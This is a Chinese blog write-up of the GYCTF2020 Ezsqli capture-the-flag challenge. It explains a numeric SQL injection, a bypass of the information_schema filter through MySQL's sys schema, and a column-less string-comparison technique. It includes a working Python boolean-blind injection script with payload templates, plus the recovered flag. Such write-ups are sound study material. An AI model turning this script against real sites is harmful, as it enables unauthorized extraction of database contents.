2021-05-04  /2021/05/04/GYCTF2020-Ezsqli/ 99+   3 分钟   0.5 k0次访问

GYCTF2020-Ezsqli

[GYCTF2020]Ezsqli

id是注入点,4/2发现是数值型注入……测试下:

image-20210504093103645

information都被过滤了……这里必须要绕过这个过滤

information_schema绕过

聊一聊bypass information_schema

mysql注入绕过information_schema过滤

information_schema代替方法

sys.schema_table_statistics_with_buffer

SELECT * from sys.schema_table_statistics_with_buffer

table_schema table_name rows_fetched fetch_latency rows_inserted insert_latency rows_updated update_latency rows_deleted delete_latency io_read_requests io_read io_read_latency io_write_requests io_write io_write_latency io_misc_requests io_misc_latency innodb_buffer_allocated innodb_buffer_data innodb_buffer_free innodb_buffer_pages innodb_buffer_pages_hashed innodb_buffer_pages_old innodb_buffer_rows_cached

可以看到有table_schema和table_name,借此可以获得表名:

image-20210504101705740

但是我们没有列名,这里需要

无列名注入

https://www.jianshu.com/p/4a084ea1c7d4

https://zhuanlan.zhihu.com/p/98206699

运用到sql比较字符串的特性,当两个字符串做比较运算时,会先比较首位字符,若首位相同,则比较第二位……

id=2||((select 1,”g”)>(select * from f1ag_1s_h3r3_hhhhh))#

两边查询的列数要相同

捋顺逻辑用二分法写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# coding=utf-8
import requests
import time

flag = ""
url = "http://bec2be36-f01b-4b15-bc93-dc44e0b9fbb6.node3.buuoj.cn/"

data1 = ""
# 库名
data2 = "2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>={}#"
# 表名
data3 = ""
# 列名
data4 = ""
# 数据
data5 = "2||((select 1,'{}')<=(select * from f1ag_1s_h3r3_hhhhh))#"
# 字符串移位比较+无列名
data = data5
# 选择post数据

for x in range(1, 200):
    l = 32
    r = 127
    while r > l:
        mid = int((l + r + 1) / 2)
        x = str(x)
        y = str(mid)
        if data != data5:
            pay = {
                "id": data.format(x, y)
                   }
        else:
            pay = {
                "id": data.format(flag+chr(int(y)))
            }
            # print(pay)
        # 这里需更改注入点
        response = requests.post(url=url, data=pay)
        # print(response.text)
        if "Nu1L" in response.text:
            l = mid
        else:
            r = mid - 1
        # time.sleep(0.03)
    flag += (chr(int(r)))
    print(chr(int(r)))
    print(flag)
print(flag)

搭了个post架,也不知道好不好用……

image-20210504112734844

转小写得到flag……

flag{333ed6af-c961-438b-91fd-c578e87536a6}

GYCTF2020-Ezsqli

http://example.com/2021/05/04/GYCTF2020-Ezsqli/

作者

inanb

发布于

2021-05-04

更新于

2021-08-23

许可协议

# 相关文章
  1.CISCN2019-华东南赛区-Double-Secret
  2.津门杯hate_php
  3.津门杯GoOSS
  4.蓝帽杯2021复现
  5.hacker101-2
  6.HarekazeCTF-2019-encode_and_encode
  7.NCTF2019-SQLi
  8.SWPUCTF-2018-SimplePHP
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×